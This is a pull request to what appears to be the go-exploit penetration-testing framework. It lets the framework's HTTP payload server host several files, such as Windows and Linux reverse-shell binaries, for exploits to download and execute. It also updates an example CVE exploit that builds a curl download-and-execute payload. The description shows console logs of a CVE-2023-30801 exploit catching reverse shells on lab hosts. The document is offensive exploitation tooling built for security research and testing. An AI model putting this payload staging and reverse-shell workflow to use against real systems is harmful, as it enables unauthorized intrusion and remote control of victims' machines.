### PR TITLE
Added support for hosting multiple files

### DIFF
--- a/c2/factory_test.go
+++ b/c2/factory_test.go
@@ -12,22 +12,22 @@ func TestHTTPServeFileInit(t *testing.T) {
 		t.Fatal("Failed to create HTTPServeFile")
 	}
 
-	if len(httpservefile.GetInstance().FileName) != 0 {
+	if len(httpservefile.GetInstance().HostedFiles) != 0 {
 		t.Fatal("Instance has a filename already")
 	}
 
-	httpservefile.GetInstance().FileToServe = "factory.go"
+	success = impl.Init("127.0.0.1", 1270, false)
+	if success {
+		t.Fatal("Should have failed to init the instance")
+	}
+	httpservefile.GetInstance().FilesToServe = "factory.go"
 	success = impl.Init("127.0.0.1", 1270, true)
 	if success {
 		t.Fatal("Failed to check if it was invoked as a client")
 	}
-	success = impl.Init("127.0.0.1", 1270, false)
-	if !success {
-		t.Fatal("Failed to init the instance")
-	}
 
 	// random name should have been generated
-	if len(httpservefile.GetInstance().FileName) == 0 {
+	if len(httpservefile.GetInstance().HostedFiles["factory.go"].RandomName) != 0 {
 		t.Fatal("Instance did not generate a random filename")
 	}
 	if httpservefile.GetInstance().HTTPAddr != "127.0.0.1" {

--- a/c2/httpservefile/httpservefile.go
+++ b/c2/httpservefile/httpservefile.go
@@ -1,16 +1,32 @@
-// httpservefile c2 spawns an HTTP or HTTPS server and hosts a single user provided file. The normal use case
+// httpservefile c2 spawns an HTTP or HTTPS server and hosts arbitrary user-provided files. The normal use case
 // is for an exploit to curl/wget the file and execute it. This is useful to spawn connections to other
-// tools (e.g. Metasploit, nc, etc.). This is not a traditional "c2" but serves as a useful backend that
-// logically plugs into our c2 design.
+// tools (e.g. Metasploit, nc, etc.) or to go-exploit. This is not a traditional "c2" but serves as a useful
+// backend that logically plugs into our c2 design.
+//
+// Files are provided on the command line as a comma delimited string. For example:
+//
+//	-httpServeFile.FilesToServe ./build/reverse_shell_windows-arm64.exe,./build/reverse_shell_linux-amd64
+//
+// The above will load two files: a windows reverse shell and a linux reverse shell. This c2 will then
+// generate random names for the files and host them on an HTTP / HTTPS server. To interact with the
+// files from an implementing exploit, you can fetch the filename to random name mapping using
+// GetRandomName(). For example:
+//
+//	httpservefile.GetInstance().GetRandomName(linux64)
+//
+// Where linux64 is a variable that contains "reverse_shell_linux-amd64".
+//
+// If you are only hosting one file, then GetRandom("") will also return your one file.
 package httpservefile
 
 import (
+	"bytes"
 	"crypto/tls"
 	"flag"
 	"fmt"
 	"net/http"
 	"os"
-	"path"
+	"strings"
 	"time"
 
 	"github.com/vulncheck-oss/go-exploit/encryption"
@@ -18,13 +34,16 @@ import (
 	"github.com/vulncheck-oss/go-exploit/random"
 )
 
-type Server struct {
-	// The local filename to read in
-	FileToServe string
+type HostedFile struct {
+	// The user provided filename
+	RealName string
 	// A randomly generated filename to serve
-	FileName string
-	// The file data to send to the client
+	RandomName string
+	// The file's data
 	FileData []byte
+}
+
+type Server struct {
 	// The HTTP address to bind to
 	HTTPAddr string
 	// The HTTP port to bind to
@@ -39,6 +58,10 @@ type Server struct {
 	CertificateFile string
 	// Loaded certificate
 	Certificate tls.Certificate
+	// A map of hosted files
+	HostedFiles map[string]HostedFile // RealName -> struct
+	// A comma delimited list of all the files to serve
+	FilesToServe string
 }
 
 var singleton *Server
@@ -54,14 +77,14 @@ func GetInstance() *Server {
 
 // User options for serving a file over HTTP as the "c2".
 func (httpServer *Server) CreateFlags() {
-	flag.StringVar(&httpServer.FileToServe, "httpServeFile.FileToServe", "", "The file to serve on the HTTP server")
+	flag.StringVar(&httpServer.FilesToServe, "httpServeFile.FilesToServe", "", "A comma delimited list of all the files to serve")
 	flag.StringVar(&httpServer.ServerField, "httpServeFile.ServerField", "Apache", "The value to insert in the HTTP server field")
 	flag.BoolVar(&httpServer.TLS, "httpServeFile.TLS", false, "Indicates if the HTTP server should use encryption")
 	flag.StringVar(&httpServer.PrivateKeyFile, "httpServeFile.PrivateKeyFile", "", "A private key to use with the HTTPS server")
 	flag.StringVar(&httpServer.CertificateFile, "httpServeFile.CertificateFile", "", "The certificate to use with the HTTPS server")
 }
 
-// load the provided file into memory. Generate the random filename.
+// load the provided files into memory, stored in a map, and loads the tls cert if needed.
 func (httpServer *Server) Init(rhostAddr string, rhostPort int, isClient bool) bool {
 	if isClient {
 		output.PrintFrameworkError("Called C2HTTPServer as a client. Use lhost and lport.")
@@ -71,23 +94,44 @@ func (httpServer *Server) Init(rhostAddr string, rhostPort int, isClient bool) b
 	httpServer.HTTPAddr = rhostAddr
 	httpServer.HTTPPort = rhostPort
 
-	if len(httpServer.FileToServe) == 0 {
+	if len(httpServer.FilesToServe) == 0 {
 		output.PrintFrameworkError("Provide an httpServeFile.FileToServe option on the command line")
 
 		return false
 	}
 
-	output.PrintfFrameworkStatus("Loading the provided file: %s", httpServer.FileToServe)
-	var err error
-	httpServer.FileData, err = os.ReadFile(httpServer.FileToServe)
-	if err != nil {
-		output.PrintFrameworkError(err.Error())
+	// split the provided files, read them in, and store them in the map
+	httpServer.HostedFiles = make(map[string]HostedFile)
+	files := strings.Split(httpServer.FilesToServe, ",")
+	for _, file := range files {
+		output.PrintfFrameworkStatus("Loading the provided file: %s", file)
+		fileData, err := os.ReadFile(file)
+		if err != nil {
+			output.PrintFrameworkError(err.Error())
 
-		return false
+			return false
+		}
+
+		// remove the path from the name (check for / and \)
+		shortName := file
+		pathSepIndex := strings.LastIndex(shortName, "/")
+		if pathSepIndex != -1 {
+			shortName = shortName[pathSepIndex+1:]
+		}
+		pathSepIndex = strings.LastIndex(shortName, `\`)
+		if pathSepIndex != -1 {
+			shortName = shortName[pathSepIndex+1:]
+		}
+
+		hosted := HostedFile{
+			RealName:   shortName,
+			RandomName: random.RandLetters(12),
+			FileData:   fileData,
+		}
+
+		output.PrintfFrameworkDebug("Added: %s", shortName)
+		httpServer.HostedFiles[shortName] = hosted
 	}
-
-	// the server will only respond 200 if this filename is requested
-	httpServer.FileName = random.RandLetters(12)
 
 	if httpServer.TLS {
 		var ok bool
@@ -113,16 +157,13 @@ func (httpServer *Server) Init(rhostAddr string, rhostPort int, isClient bool) b
 
 // start the HTTP server and listen for incoming requests for `httpServer.FileName`.
 func (httpServer *Server) Run(timeout int) {
-	// validate the request is for the appropriate file and then send it
-	http.HandleFunc("/"+httpServer.FileName, func(writer http.ResponseWriter, r *http.Request) {
-		// set the user provided HTTP server field
-		writer.Header().Set("Server", httpServer.ServerField)
-		if path.Base(r.URL.Path) == httpServer.FileName {
-			// respond with the binary
-			writer.Header().Set("Content-Type", "application/octet-stream")
-			_, _ = writer.Write(httpServer.FileData)
-		}
-	})
+	// set up handlers for each of the files
+	for _, hosted := range httpServer.HostedFiles {
+		http.HandleFunc("/"+hosted.RandomName, func(writer http.ResponseWriter, req *http.Request) {
+			writer.Header().Set("Server", httpServer.ServerField)
+			http.ServeContent(writer, req, hosted.RandomName, time.Time{}, bytes.NewReader(hosted.FileData))
+		})
+	}
 
 	connectionString := fmt.Sprintf("%s:%d", httpServer.HTTPAddr, httpServer.HTTPPort)
 	go func() {
@@ -150,4 +191,22 @@ func (httpServer *Server) Run(timeout int) {
 
 	// We don't actually clean up anything, but exiting c2 will eventually terminate the program
 	output.PrintFrameworkStatus("Shutting down the HTTP Server")
+}
+
+// Returns the random name of the provided filename. If filename is empty, return the first entry.
+func (httpServer *Server) GetRandomName(filename string) string {
+	if len(filename) == 0 {
+		for _, hosted := range httpServer.HostedFiles {
+			return hosted.RandomName
+		}
+	}
+
+	hosted, found := httpServer.HostedFiles[filename]
+	if !found {
+		output.PrintfFrameworkError("Requested a file that doesn't exist: %s", filename)
+
+		return ""
+	}
+
+	return hosted.RandomName
 }

--- a/c2/httpservefile/httpservefile.go
+++ b/c2/httpservefile/httpservefile.go
@@ -26,6 +26,7 @@ import (
 	"fmt"
 	"net/http"
 	"os"
+	"path"
 	"strings"
 	"time"
 
@@ -129,7 +130,7 @@ func (httpServer *Server) Init(rhostAddr string, rhostPort int, isClient bool) b
 			FileData:   fileData,
 		}
 
-		output.PrintfFrameworkDebug("Added: %s", shortName)
+		output.PrintfFrameworkDebug("Added %s as %s", hosted.RealName, hosted.RandomName)
 		httpServer.HostedFiles[shortName] = hosted
 	}
 
@@ -161,7 +162,18 @@ func (httpServer *Server) Run(timeout int) {
 	for _, hosted := range httpServer.HostedFiles {
 		http.HandleFunc("/"+hosted.RandomName, func(writer http.ResponseWriter, req *http.Request) {
 			writer.Header().Set("Server", httpServer.ServerField)
-			http.ServeContent(writer, req, hosted.RandomName, time.Time{}, bytes.NewReader(hosted.FileData))
+
+			name := path.Base(req.URL.Path)
+			// cannot used hosted as the values move on with the loop
+			for _, selected := range httpServer.HostedFiles {
+				if selected.RandomName == name {
+					http.ServeContent(writer, req, selected.RandomName, time.Time{}, bytes.NewReader(selected.FileData))
+
+					return
+				}
+			}
+
+			writer.WriteHeader(http.StatusNotFound)
 		})
 	}
 

--- a/c2/httpserveshell/httpserveshell.go
+++ b/c2/httpserveshell/httpserveshell.go
@@ -1,4 +1,4 @@
-// HTTPServeShell is (literally) a combination of HTTPServeFile and (SSLShell || SimpleShellServer).
+// httpservershell is (literally) a combination of HTTPServeFile and (SSLShell || SimpleShellServer).
 // The use case is when you want to drop/execute a custom binary, but you still want to catch it in
 // go-exploit. Example usage:
 //

--- a/examples/cve-2022-44877/cve-2022-44877.go
+++ b/examples/cve-2022-44877/cve-2022-44877.go
@@ -108,7 +108,7 @@ func generatePayload(conf *config.Config) (string, bool) {
 		output.PrintfFrameworkStatus("Sending a bind shell for port %d", conf.Bport)
 		generated = payload.BindShellMkfifoNetcat(conf.Bport)
 	case c2.HTTPServeFile:
-		filename := httpservefile.GetInstance().FileName
+		filename := httpservefile.GetInstance().GetRandomName("")
 		addr := protocol.GenerateURL(conf.Lhost, conf.Lport, httpservefile.GetInstance().TLS, "/"+filename)
 		output.PrintfFrameworkStatus("Sending an HTTP download payload to %s", addr)
 		generated = payload.LinuxCurlHTTPDownloadAndExecute(conf.Lhost, conf.Lport, httpservefile.GetInstance().TLS, filename)


### PR DESCRIPTION
httpservefile (and therefore httpserveshell) can now support multiple hosted files. This is useful for the case where you are exploiting a target across multiple OS/architectures.

Files will now be taken in as a comma delimited string:

```
-httpServeFile.FilesToServe ./build/reverse_shell_windows-arm64.exe,./build/reverse_shell_linux-amd64
```

The above will load two files: a windows reverse shell and a linux reverse shell. This c2 will then generate random names for the files and host them on an HTTP / HTTPS server. To interact with the files from an implementing exploit, you can fetch the filename to random name mapping using GetRandomName(). For example:

```go
httpservefile.GetInstance().GetRandomName(linux64)
```
Where linux64 is a variable that contains "reverse_shell_linux-amd64".  If you are only hosting one file, then GetRandom("") will also return your one file.


Here is a real world example that targets both Windows arm and Linux x64:

Linux:
```
albinolobster@mournland:~/initial-access/feed/cve-2023-30801$ ./build/cve-2023-30801_linux-arm64 -e -rhost 10.9.49.143 -lhost 10.9.4
9.134 -lport 1270 -httpServeFile.BindAddr 10.9.49.134 -httpServeShell.SSLShell=false -httpServeFile.FilesToServe ./build/reverse_she
ll_windows-arm64.exe,./build/reverse_shell_linux-amd64 -linux64 reverse_shell_linux-amd64 -windows64 reverse_shell_windows-arm64.exe
 
time=2023-09-08T16:37:29.097-04:00 level=STATUS msg="Loading the provided file: ./build/reverse_shell_windows-arm64.exe"
time=2023-09-08T16:37:29.103-04:00 level=STATUS msg="Loading the provided file: ./build/reverse_shell_linux-amd64"
time=2023-09-08T16:37:29.119-04:00 level=STATUS msg="Starting listener on 10.9.49.134:1270"
time=2023-09-08T16:37:29.122-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.143 port=8080 ssl=false "ssl auto"=false
time=2023-09-08T16:37:29.124-04:00 level=STATUS msg="Starting an HTTP server on 10.9.49.134:8080"
time=2023-09-08T16:37:29.287-04:00 level=STATUS msg="Using session: SID=toZFq7XxIjS/4mj4LBDUNJaZAccen9Nd"
time=2023-09-08T16:37:29.294-04:00 level=STATUS msg="Selecting a Linux payload"
time=2023-09-08T16:37:30.525-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.143:40396"
time=2023-09-08T16:37:30.525-04:00 level=STATUS msg="Active shell from 10.9.49.143:40396"
time=2023-09-08T16:37:31.382-04:00 level=STATUS msg="Exploit successfully completed"
id
uid=1000(albinolobster) gid=1000(albinolobster) groups=1000(albinolobster),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1001(rvm)
```

Windows:
```
albinolobster@mournland:~/initial-access/feed/cve-2023-30801$ ./build/cve-2023-30801_linux-arm64 -e -rhost 10.9.49.133 -lhost 10.9.49.134 -lport 1270 -httpServeFile.BindAddr 10.9.49.134 -httpServeShell.SSLShell=false -httpServeFile.FilesToServe ./build/reverse_shell_windows-arm64.exe,./build/reverse_shell_linux-amd64 -linux64 reverse_shell_linux-amd64 -windows64 reverse_shell_windows-arm64.exe 
time=2023-09-08T16:36:25.598-04:00 level=STATUS msg="Loading the provided file: ./build/reverse_shell_windows-arm64.exe"
time=2023-09-08T16:36:25.602-04:00 level=STATUS msg="Loading the provided file: ./build/reverse_shell_linux-amd64"
time=2023-09-08T16:36:25.605-04:00 level=STATUS msg="Starting listener on 10.9.49.134:1270"
time=2023-09-08T16:36:25.605-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.133 port=8080 ssl=false "ssl auto"=false
time=2023-09-08T16:36:25.605-04:00 level=STATUS msg="Starting an HTTP server on 10.9.49.134:8080"
time=2023-09-08T16:36:25.699-04:00 level=STATUS msg="Using session: SID=87eHnvaWkNVFWd+FZtJwbU9vANU+tywf"
time=2023-09-08T16:36:25.703-04:00 level=STATUS msg="Selecting a Windows payload"
time=2023-09-08T16:36:25.906-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.133:60011"
time=2023-09-08T16:36:25.906-04:00 level=STATUS msg="Active shell from 10.9.49.133:60011"
time=2023-09-08T16:36:27.809-04:00 level=STATUS msg="Exploit successfully completed"
whoami
albinolobst9bd8\albinolobster
```